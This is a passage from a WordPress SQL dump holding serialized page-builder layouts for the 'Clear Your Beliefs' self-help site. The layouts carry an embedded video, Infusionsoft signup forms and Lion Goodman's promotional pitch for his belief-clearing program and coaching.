-43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:603:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -9px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 6px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -42px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1234, 1706, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:603:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -9px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1235, 1707, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:603:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -9px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1236, 1708, '_wp_attached_file', '2014/08/JSK-Video-Final.flv'),
